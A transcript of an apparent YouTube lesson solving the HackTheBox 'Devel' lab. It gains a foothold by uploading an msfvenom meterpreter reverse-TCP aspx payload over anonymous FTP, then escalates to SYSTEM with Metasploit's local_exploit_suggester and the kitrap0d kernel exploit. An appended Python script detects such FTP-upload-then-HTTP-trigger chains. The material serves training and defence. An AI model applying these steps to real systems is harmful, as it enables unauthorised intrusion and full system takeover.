HackTheBox Devel CTF walkthrough - Privilege Escalation via Kernel Exploitation with Metasploit

Captions
Privilege escalation by kernel exploitation, like anyone can even know that. Hi friends, so today's introduction is a little lengthier than usual, so if you prefer to just jump straight into the lesson, go to this time marker now. Please, please, I don't have any time for any gossip now. Yes, so if you're still here, welcome. So today, as part of our Learning C2 with Metasploit series, I'll kick off a whole series of videos on privilege escalation. Specifically, in this video and the next one we'll be covering privilege escalation via kernel exploitation. Privilege escalation via kernel exploitation. Privilege escalation via kernel exploitation. So the reason I'm dedicating two videos to this topic is that I would like for us to achieve the same outcome by following two different paths, that being with Metasploit and without Metasploit. Now many people advise beginners to steer clear of Metasploit when you start learning red teaming, and this is not because Metasploit is too advanced for beginners but rather because Metasploit simplifies so many aspects of red teaming that it can actually impede your learning journey. In effect Metasploit black-boxes and takes care of so many elements you'd usually need to do manually, and so if you solely rely on Metasploit you can develop major blind spots. Now I agree with this sentiment, but with a caveat, because in my opinion I think there is a third path that's even better, and that is when we perform the same action with Metasploit and without Metasploit and we critically compare the two different approaches. What I really like about this approach is that it shows us at the same time what is both unique and not unique to each different path. When we start to understand the commonalities across all the different techniques, it really helps us to better internalize what it is we are actually doing, and additionally, for beginners, it really helps us to remove our blinders, because sometimes we get stuck on this idea that every single machine only has a single solution. So by solving the same machine in different ways it really helps free us from this limiting mindset. Free your mind.

So far in this series we've only been attacking virtual machines that we've set up ourselves. Now this is my preferred way to learn as it really promotes systems-level thinking, but at the same time it has a major limitation. The limitation of course is that it would be nearly impossible to create a virtual machine that covers every single possible vulnerability, and so because of this, from now on we will supplement our approach of attacking our own virtual machine by also introducing specific machines from the Hack The Box platform. So in today's lesson we'll be gaining system-level privileges via kernel exploitation by using Metasploit. The specific Hack The Box machine we'll be attacking is called Devel. Sometimes I think you don't have any respect for me. And you can find the link right at the top of the description. So I do plan on making a very extensive theoretical exploration of all of privilege escalation in the future, but for now, if you would like to know a little bit more about what kernel exploitation is and what it entails, i.e. the theory underpinning it, I've posted a link to an excellent lecture on this topic by Zack EOB right at the top of the description. But in any case, methinks that's enough with all this flipping and diddling for now, so let's get to it.

All right friends, and so you can see I'm here in my terminal on Kali and I've already connected to the machine, so all that's done on the backside. Again, this isn't going to be a CTF walkthrough, so I'm not going to go through every single step of how you would solve a typical CTF ad nauseam; rather let's just kind of quickly get our foothold so we can get to the real focus of today, which is of course privilege escalation using kernel exploitation. All right, so the first thing we'll do is our good old friend nmap, and I'll enumerate for standard versions and run standard scripts, and Devel is 10.10.10.5. A few moments later. All right friends, and here you can see our results. So we can immediately see two ports are open: 21, FTP, as well as 80, HTTP. So let's just look at it a little closer. The first thing that obviously stands out for us looking at the FTP is that anonymous login is allowed. Not only is anonymous login allowed, it's showing us a directory overview of the files on the FTP drive, and if we look at these files something immediately stands out to me. Now for those of you that didn't know, there are three major web servers that are the three most popular servers that people typically run. The first two are Linux and they're called Apache and nginx, and the third one is the sole Microsoft web server in this top three and it's called IIS. And so we can immediately notice that they're running Microsoft IIS on the web server on port 80, but if we look at these files you can even see there's iisstart.htm, so immediately this looks to me as if these are the default files if you've just freshly installed IIS. So let's quickly go have a look at the website, and we see that the website itself on port 80 is still the default install. And I don't know if you remember, we just saw welcome.png, and if we inspect this, there we can see indeed this is welcome.png.

So perhaps you've now already put two and two together, but if not, no worries, let's quickly head back to the terminal. And so what it basically is, guys, is that the files here that are on the FTP server are basically the files that are being hosted and displayed by the HTTP server, and so we can immediately think that if we're able to perhaps upload something on the FTP server, we will be able to access that file that we uploaded via the HTTP server. And what's something that we love to be able to upload and execute? Of course, any script or payload that can do a reverse TCP connection back to a listener on our end. And so immediately, even before logging on, I'm just going to use msfvenom and create a payload. But right before we do that we can run ip a to just quickly check our IP address. And now here's another thing, guys: if you're not used to Hack The Box, you typically look at your IP there and then you think, well, that's my IP. This is obviously the interface of my private LAN, so that's my private IP address, but right now we're tunneled (you see tun) into another network, where I am now on the Hack The Box network. The Hack The Box network has no idea that on my local LAN this is my IP; instead, when we connected with the VPN to the Hack The Box network it assigned an IP to us, and this is our IP. So I'm just going to copy my IP. Next thing, we'll run msfvenom, so I'll just type msfvenom, -p for payload, and then our shell, because we're going to be using Metasploit, is a meterpreter shell, right, and then finally we'll choose a reverse TCP connection. So we just saw the LHOST, I'm just going to paste that, and then LPORT can obviously be anything, I'll just choose 1234. And then the next one is the file type. Now this is pretty important, because we want to make sure that the server is capable of actually executing the file, and so for example, I'm sure you've seen before, if you encounter a web server that's using PHP you typically craft a script in PHP to ensure that that system is able to execute it. So a format we can choose that's a very safe bet on an IIS server would be aspx, and without going into it too deeply, that's just simply because the aspx files are part of the ASP.NET framework, which is the server-side web application framework used by IIS. And so finally we can just choose a name, and I'll just call it kernel.aspx. So we can see we have successfully generated our payload.

So the next step now is to get this payload onto the victim system. So we saw during the nmap scan that we do have anonymous access to the FTP drive, so then hopefully we'll have the ability to upload this payload to the FTP server, whereafter we can touch it with the HTTP server. So with FTP it's very simple, you just write ftp and the IP. It's asking us for a name, and so we'll write anonymous, and for password again we will write anonymous, and we can see we're logged in. Let's just run dir, and we can see that the three files that we saw during the nmap scan are indeed the three files here on the FTP server. So next thing, we'll just upload our payload with the command put kernel.aspx, and we can see that we've successfully uploaded it, and so we can just get out of the FTP server. Going to clear, and now we should theoretically be able to use our web browser to execute the payload. But obviously that's one half of the puzzle; we also now need our handler or listener, and so in this case I'll open msfconsole so that we can create a meterpreter handler. Great, so the first thing is I'll write use multi/handler. Now the next thing is we need to choose our specific type of payload, and as I've shared before, there should be an exact reflection of the payload that we created earlier, so we'll write set payload, and we did windows/meterpreter/reverse_tcp. And we have the three typical options, so first let's set LHOST, and it's 10.10.14.4; we set LPORT, and we chose 1234; and finally I'll set ExitOnSession to false. Then I'll run with -j to put it in the background, and we can see our handler right there. So we have this handler and it's stationed at port 1234, now it's just waiting for the incoming call, right, and we have our payload on the FTP server, and if we trigger that payload it's going to call back and give us our connection.

So now really the only thing to do is to trigger our payload, so let's go back to our web browser, and here on our web browser we're simply going to write /kernel.aspx, and let's go check back with msfconsole, and we can see right there: meterpreter session one opened. Can confirm, there we can see it. And so the next thing, obviously, let's just use our meterpreter shell with -i for interact and 1. Great, and we have our meterpreter shell. Now since, as I said in the beginning, we'll be doing everything with Metasploit in this specific video, today we'll be using an automatic enumerating module from Metasploit called suggester. Now I do want to mention, we have a shell on the victim system, and often I've seen when people get a meterpreter shell the first thing they do is just write shell straight away, because it takes them to command prompt, which is something they're used to, and I've actually noticed that some people just basically think meterpreter is kind of like a stepping stone to just get to a command prompt shell. But meterpreter offers us a whole lot of built-in tools that we can't get with our regular command prompt shell, and so this is such a case. And so we use the command post, for post exploitation; multi, because it sounds cool; recon, that's what we're doing; and then really the gist of it is the name of the module, which is local_exploit_suggester. So let's run that. A few moments later. And here you can see the results, friends. You can see there are a whole lot of exploits that Metasploit thinks the system is potentially vulnerable to. So today, of course, since the focus is kernel exploits, we'll be focusing on kitrap0d. Now if you weren't focusing on anything specific, you were just trying to pwn this box like a leet hacker, well then you could literally go through these one by one, you could spend some more time researching each of these, seeing what the typical success rate is, or you can simply use the things that you're familiar with and have worked well for you in the past. But in this case we'll specifically use kitrap0d, and I'm actually just going to right click and copy that, because this is now the name of the module we're going to use. And so here we're actually going to background our meterpreter shell, which of course means it's still running but we get to interact with the msfconsole again, and also take note what your session number is; in our case the session is one. And so next I'm just going to write use and I'm going to paste the name that we just copied of the specific exploit, kitrap0d, going to hit enter, write show options. Now the first thing we see here right up top is SESSION, and as I just said, my session is one and yours might be different. The next thing is the LHOST, which is of course 10.10.14.4, and now the next one is LPORT. I'm going to leave it 4444; it can be anything except for the port that's already occupied by our session one, because essentially we're going to use this exploit to create a brand new session in which we should be SYSTEM. And so really that's it, and we should just be able to run it and get our new shell as SYSTEM. And we can see we have a new meterpreter shell, so let's drop into our command prompt shell, then let's write whoami, and we can see that we're SYSTEM. And so basically we've elevated our privileges from the regular user to SYSTEM, the highest authority. And how did we do that? Well, we did that simply by using a built-in Metasploit module which allowed us to take advantage of a kernel exploit, which was in turn identified by local_exploit_suggester, another Metasploit module. So we used a Metasploit module to enumerate, then we used another Metasploit module to then capitalize on this exploit.

Okay friends, well I hope you enjoyed that lesson. I'll be back with another video shortly where we'll essentially be doing the same thing but without Metasploit. Be sure to keep a lookout, because it will obviously be awesome, but until then, peace out.
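The foothold in the video leaves two traces a defender can correlate: an anonymous FTP write (STOR) of a server-executable file, and a later HTTP request for that same filename from the web root the FTP share exposes. The script below is an added example, not code from the video, the Devel machine or Metasploit. It runs over constructed, space-separated log lines whose column layout is an assumption chosen for the example (simplified, not the exact IIS W3C field order), so a real deployment would map its columns to the configured log fields. The underlying fix is to deny anonymous write on the FTP site (or stop sharing the IIS web root over FTP at all) and to alert on any web-executable extension arriving by FTP, whether or not it is later requested.

```python
"""Correlate anonymous FTP uploads of web-executable files with later HTTP hits.

Added example for the Devel walkthrough; log formats and sample data are
constructed for this demonstration and are not real IIS output.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PurePosixPath
from typing import List, Optional, Tuple

# Extensions that IIS (or another server) would execute rather than serve as-is.
WEB_EXEC_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}

# Constructed FTP log. Assumed columns: date time client-ip user command argument status
FTP_LOG = """\
2023-12-14 10:01:02 10.10.14.4 anonymous USER anonymous 331
2023-12-14 10:01:03 10.10.14.4 anonymous PASS *** 230
2023-12-14 10:01:05 10.10.14.4 anonymous RETR welcome.png 226
2023-12-14 10:01:20 10.10.14.4 anonymous STOR kernel.aspx 226
2023-12-14 10:02:00 10.10.14.9 anonymous STOR notes.txt 226
"""

# Constructed HTTP log. Assumed columns: date time server-ip method uri status client-ip
HTTP_LOG = """\
2023-12-14 10:01:30 10.10.10.5 GET /iisstart.htm 200 10.10.14.4
2023-12-14 10:01:45 10.10.10.5 GET /kernel.aspx 200 10.10.14.4
2023-12-14 10:02:10 10.10.10.5 GET /notes.txt 200 10.10.14.9
"""


@dataclass
class Finding:
    filename: str
    uploader: str
    uploaded_at: datetime
    requested_at: Optional[datetime]  # None if the file was never requested
    requester: Optional[str]

    @property
    def severity(self) -> str:
        # An anonymous write of executable content is already worth a ticket;
        # a follow-up request for it means the chain very likely completed.
        return "high" if self.requested_at else "medium"


def _ts(date: str, time: str) -> datetime:
    return datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")


def anonymous_web_uploads(ftp_log: str) -> List[Tuple[str, str, datetime]]:
    """Return (filename, client, timestamp) for successful anonymous STORs of executable files."""
    uploads = []
    for line in ftp_log.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, client, user, command, arg, status = parts[:7]
        if command != "STOR" or user.lower() != "anonymous":
            continue
        if not status.startswith("2"):  # only completed transfers (2xx reply)
            continue
        name = PurePosixPath(arg).name
        if PurePosixPath(name).suffix.lower() in WEB_EXEC_EXTENSIONS:
            uploads.append((name, client, _ts(date, time)))
    return uploads


def correlate(ftp_log: str, http_log: str, window: timedelta = timedelta(hours=1)) -> List[Finding]:
    """Pair each flagged upload with the first HTTP request for the same filename inside the window."""
    requests = []
    for line in http_log.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, _server, method, uri, _status, client = parts[:7]
        requests.append((_ts(date, time), method, PurePosixPath(uri).name, client))

    findings = []
    for name, uploader, uploaded_at in anonymous_web_uploads(ftp_log):
        hit = next(
            ((t, c) for t, _m, n, c in requests if n == name and uploaded_at <= t <= uploaded_at + window),
            None,
        )
        findings.append(Finding(name, uploader, uploaded_at, hit[0] if hit else None, hit[1] if hit else None))
    return findings


if __name__ == "__main__":
    for f in correlate(FTP_LOG, HTTP_LOG):
        print(f"[{f.severity}] {f.filename} uploaded by {f.uploader} at {f.uploaded_at}; "
              f"requested by {f.requester} at {f.requested_at}")
```

On the constructed data only kernel.aspx is reported: welcome.png is a download (RETR), not an upload, and notes.txt is not an executable type. Matching by bare filename rather than full path is deliberate, because the FTP share and the web root are the same directory in this scenario; if they differ, the path mapping belongs in the comparison.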
Info
Channel: faan ross
Views: 553
Id: BRurEae5vHo
Length: 14min 37sec (877 seconds)
Published: Thu Dec 14 2023